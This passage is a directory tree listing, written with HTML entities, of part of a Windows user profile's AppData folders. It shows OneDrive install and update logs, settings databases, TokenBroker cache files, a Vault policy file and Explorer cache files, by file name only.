&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Update_2025-08-15_212512_2068-2130.loggz
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Update_2025-08-20_164947_3016-4652.loggz
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive.App.exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive.exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveStandaloneUpdater.exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive.VisualElementsManifest.xml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Resources.pri
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Personal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; assertInformation.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CxP.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CxP.db-shm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CxP.db-wal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ECSConfig.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; global.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; logUploaderSettings.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; logUploaderSettings_temp.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OCSI.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SettingsDatabase.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SettingsDatabase.db-shm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SettingsDatabase.db-wal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SurveyManagerState.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SyncEngineDatabase.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; PreSignInSettingsConfig.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; setup
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ECSConfig.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; logs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; DeviceHealthSummaryConfiguration.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install_2025-08-15_212507_25e4-12a0.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install_2025-08-15_212525_9808-9804.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-2025-08-15.2125.9700.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-2025-08-15.2125.9808.1.aodl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-2025-08-15.2125.9808.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install_2025-08-20_165044_4816-1360.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-2025-08-20.1650.4816.1.aodl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-2025-08-20.1650.4816.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install_2025-08-20_165505_7240-7360.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install_2025-08-20_165559_8636-8640.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-PerUser_2025-08-15_212507_1b00-230.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-PerUser_2025-08-15_212534_7420-5740.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-PerUser-2025-08-15.2125.6912.1.aodl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-PerUser-2025-08-15.2125.6912.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-PerUser-2025-08-15.2125.7420.1.aodl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-PerUser-2025-08-15.2125.7420.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-PerUser-2025-08-20.1650.2320.1.aodl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-PerUser-2025-08-20.1650.2320.1.odl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Install-PerUser_2025-08-20_165046_2320-2608.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; StandaloneUpdate_2025-08-20_165434_7556-7560.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; StandaloneUpdate_2025-08-20_165434_7564-7568.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Update_2025-08-15_212512_2068-2130.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Update_2025-08-15_212545_1252-760.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Update_2025-08-20_164947_3016-4652.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Update_2025-08-20_165603_7272-7880.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Update_2025-08-20_173431_7588-2904.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; StandaloneUpdater
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ECSConfig.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; PreSignInSettingsConfig.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Update
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; OneDriveSetup.exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; update.xml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; PenWorkspace
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; DiscoverCacheData.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TokenBroker
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Cache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 1521f696d8626c8e8127c0284ab987ff1974f39a.tbres
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 4e7a3602a6530194fc2a9d803f78656054f42b7e.tbres
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 51783692009bf8712b831eb4e8a04f24e104bd5a.tbres
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 5475cb191e478c39370a215b2da98a37e9dc813d.tbres
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 78c091ac6d34daa9d603629dd088840de549030f.tbres
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; 9381d1eda90e9d9a7244894a11dbeaceaca12311.tbres
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Vault
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Policy.vpol
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; UserProfileRoaming
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Latest.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Windows
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1033
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; StructuredQuerySchema.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ActionCenterCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; windows-systemtoast-suggested_16_0
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; AppCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 4W403QA7
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Application Shortcuts
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; desktop.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Burn
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Burn
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; desktop.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Caches
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; {31B1445D-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; {3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000000c.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; {AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; cversions.1.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; cversions.3.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Explorer
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ExplorerStartupLog.etl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_1280.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_16.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_1920.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_2560.db
